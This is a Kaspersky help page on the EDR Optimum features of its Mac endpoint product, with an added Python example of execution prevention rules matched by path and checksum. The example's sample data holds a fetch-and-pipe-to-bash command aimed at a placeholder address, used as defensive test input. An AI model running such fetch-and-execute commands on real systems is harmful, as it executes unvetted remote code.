Kaspersky Endpoint Security 12 for Mac

Endpoint Detection and Response Optimum

July 2, 2024

ID 276062

Starting with version 12.1, Kaspersky Endpoint Security for Mac includes a built-in agent for the Kaspersky Endpoint Detection and Response Optimum solution (hereinafter also "EDR Optimum"). This solution is designed to protect the corporate IT infrastructure from advanced cyber threats. It combines automatic threat detection with the ability to respond to detected threats, so that advanced attacks, including new exploits, ransomware, fileless attacks, and attacks that abuse legitimate system tools, can be countered. For details about the solution, see the Kaspersky Endpoint Detection and Response Optimum Help.

Kaspersky Endpoint Detection and Response reviews and analyzes how a threat develops and provides security personnel or the Administrator with the information about the potential attack that is necessary for a timely response. Alert details are displayed in a separate window. Alert Details is a tool for viewing all of the information collected about a detected threat, for example, the history of files appearing on the computer. For details about managing alert details, refer to the Kaspersky Endpoint Detection and Response Optimum Help.

Note: You can configure the EDR Optimum component in Web Console and Cloud Console.

Endpoint Detection and Response settings

Parameter

Description

Network isolation

Automatic isolation of the computer from the network in response to detected threats.

When network isolation is turned on, the application severs all active connections and blocks all new TCP/IP connections on the computer. The application leaves only the following connections active:

  • Connections listed in Network isolation exclusions.
  • Connections initiated by Kaspersky Endpoint Security services.
  • Connections initiated by the Kaspersky Security Center Network Agent.

Automatically unlock isolated computer in N hours

Network isolation can be turned off automatically after a specified time or manually. By default, Kaspersky Endpoint Security turns off Network isolation 8 hours after the start of the isolation.

Network isolation exclusions

List of rules for exclusions from network isolation. Network connections that match the rules are not blocked on computers when Network isolation is turned on.

To configure Network isolation exclusions, you can use a list of standard network profiles. By default, exclusions include network profiles containing rules that ensure uninterrupted operation of devices with the DNS/DHCP server and DNS/DHCP client roles. You can also modify the settings of standard network profiles or define exclusions manually.

Important: Exclusions specified in policy properties are applied only if Network isolation is turned on automatically in response to a detected threat. Exclusions specified in computer properties are applied only if Network isolation is turned on manually in computer properties in the Kaspersky Security Center console or in alert details.

Execution prevention

Execution prevention lets you control whether executable files and scripts may run and whether office-format documents may be opened. In this way, you can, for example, prevent the execution of applications that you consider insecure and stop a threat from spreading. Execution prevention supports a set of script interpreters.

To use the Execution prevention component, you need to add execution prevention rules. An execution prevention rule is a set of criteria that the application takes into account when reacting to an attempt to execute or open an object, for example when blocking that attempt. The application identifies files by their paths or by checksums calculated using the MD5 and SHA256 hashing algorithms.

Action on execution or opening of forbidden object

Block and write to report. In this mode, the application blocks the execution of objects or opening of documents that match prevention rule criteria. The application also publishes an event about attempts to execute objects or open documents to the Kaspersky Security Center event log and the unified logging system.

Log events only. In this mode, Kaspersky Endpoint Security publishes an event about attempts to run executable objects or open documents that match prevention rule criteria to the Kaspersky Security Center event log and the unified logging system, but does not block the attempt to run or open the object or document. This mode is selected by default.
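To make the rule semantics concrete, the following added example (not Kaspersky's own code, rule format, or event schema) evaluates an execution attempt against a small constructed rule set that identifies objects by path or by MD5/SHA256 checksum, and applies the two action modes described above. The rule names, the sample script content, the assumption that every criterion set on a rule must match, and the use of shell-style path patterns are all illustrative choices made here, not product behaviour.

```python
"""Toy evaluator for execution prevention rules.

Constructed illustration only: it is not Kaspersky's rule format, API, or
event schema. A rule may carry a path pattern, an MD5 checksum, a SHA256
checksum, or a combination; here we assume every criterion that is set on a
rule must match (an assumption made for this example).
"""
import fnmatch
import hashlib
from dataclasses import dataclass
from typing import Optional

BLOCK_AND_REPORT = "block_and_report"
LOG_ONLY = "log_only"  # the mode the product selects by default


@dataclass(frozen=True)
class PreventionRule:
    name: str
    path: Optional[str] = None     # pattern, e.g. "/Users/*/Downloads/*.sh"
    md5: Optional[str] = None      # hex digest
    sha256: Optional[str] = None   # hex digest

    def matches(self, path: str, data: bytes) -> bool:
        """True when every criterion set on the rule matches the object.
        Note: fnmatch's '*' also crosses '/' (unlike a shell glob)."""
        if self.path is not None and not fnmatch.fnmatch(path, self.path):
            return False
        if self.md5 is not None and hashlib.md5(data).hexdigest() != self.md5.lower():
            return False
        if self.sha256 is not None and hashlib.sha256(data).hexdigest() != self.sha256.lower():
            return False
        # A rule with no criteria at all must never match anything.
        return any(c is not None for c in (self.path, self.md5, self.sha256))


def evaluate(path: str, data: bytes, rules, mode: str) -> dict:
    """Decide whether an execute/open attempt is allowed and build the event.

    Returns {"allowed": bool, "event": dict | None}. In LOG_ONLY mode the
    attempt is allowed but still produces an event; in BLOCK_AND_REPORT mode
    matching objects are blocked and an event is produced.
    """
    hits = [r.name for r in rules if r.matches(path, data)]
    if not hits:
        return {"allowed": True, "event": None}
    blocked = mode == BLOCK_AND_REPORT
    event = {
        "object": path,
        "sha256": hashlib.sha256(data).hexdigest(),
        "rules": hits,
        "action": "blocked" if blocked else "logged",
    }
    return {"allowed": not blocked, "event": event}


# Constructed sample input: a dropper-style shell script (not a real sample).
EVIL_SCRIPT = b"#!/bin/bash\ncurl -fsSL http://203.0.113.10/p | bash\n"

# Constructed rule set: one path rule, one checksum rule, one office-document rule.
SAMPLE_RULES = [
    PreventionRule("downloads-shell-scripts", path="/Users/*/Downloads/*.sh"),
    PreventionRule("known-bad-installer",
                   sha256=hashlib.sha256(EVIL_SCRIPT).hexdigest()),
    PreventionRule("macro-docs-in-tmp", path="/tmp/*.docm"),
]


if __name__ == "__main__":
    for mode in (LOG_ONLY, BLOCK_AND_REPORT):
        print(mode, evaluate("/Users/alice/Downloads/setup.sh", EVIL_SCRIPT,
                             SAMPLE_RULES, mode))
    # Renaming the file defeats the path rule but not the checksum rule.
    print(evaluate("/usr/local/bin/update", EVIL_SCRIPT, SAMPLE_RULES, BLOCK_AND_REPORT))
```

The renamed-file case is the practical reason to prefer checksum rules for known-bad objects and path rules for policy decisions such as "nothing in Downloads may run"; the checksum rule keeps matching after the object is moved, while a path rule is only as strong as the attacker's willingness to keep the file where it was dropped.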

Cloud Sandbox

Cloud Sandbox is a technology that lets you detect advanced threats on a computer. Kaspersky Endpoint Security automatically forwards detected files to Cloud Sandbox for analysis. Cloud Sandbox runs these files in an isolated environment to identify malicious activity and assigns them a reputation. Data on these files is then sent to Kaspersky Security Network. As a result, if Cloud Sandbox has identified a file as malicious, Kaspersky Endpoint Security performs the appropriate action to eliminate this threat on all computers where the file is detected.

Note: Cloud Sandbox technology is permanently enabled and is available to all Kaspersky Security Network users regardless of the type of license they are using.

In this section

Integration with Endpoint Detection and Response Optimum

Scan for indicators of compromise

Move file to Quarantine

Get file

Delete file

Start process

Terminate process

Execution prevention

Computer network isolation

Cloud Sandbox
